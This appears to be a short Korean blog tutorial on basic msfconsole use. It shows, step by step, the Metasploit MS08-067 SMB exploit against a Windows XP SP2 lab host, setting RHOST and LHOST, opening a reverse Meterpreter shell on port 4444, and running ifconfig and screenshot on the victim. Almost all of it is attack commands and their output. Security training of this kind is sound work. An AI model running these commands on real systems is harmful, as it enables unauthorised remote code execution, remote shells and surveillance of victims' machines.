[metasploit] msfconsole 기본사용법 (MS08_067)
msfconsole 실행
#msfconsole
타겟 시스템에 MS08_067 취약점 존재한다는 가정하에..
msf > search ms08_067 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.221.157 RHOST => 192.168.221.157 msf exploit(ms08_067_netapi) > set LHOST 192.168.221.158 LHOST => 192.168.221.158 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.221.158:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:Korean [*] Selected Target: Windows XP SP2 Korean (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.221.157 [*] Meterpreter session 2 opened (192.168.221.158:4444 -> 192.168.221.157:1377) at 2012-10-11 13:04:57 +0900 meterpreter > ifconfig Interface 1 ============ Name : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00:00 MTU : 1520 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 Interface 2 ============ Name : AMD PCNET Family PCI Ethernet Adapter - ÆÐŶ ½ºÄÉÁÙ·¯ ¹Ì´Ï Æ÷Æ® Hardware MAC : 00:0c:29:cf:07:4d MTU : 1500 IPv4 Address : 192.168.221.157 IPv4 Netmask : 255.255.255.0 meterpreter > screenshot Screenshot saved to: /root/cMYcJvsk.jpeg /usr/bin/www-browser: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /usr/bin/www-browser) /usr/bin/www-browser: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /usr/bin/www-browser) |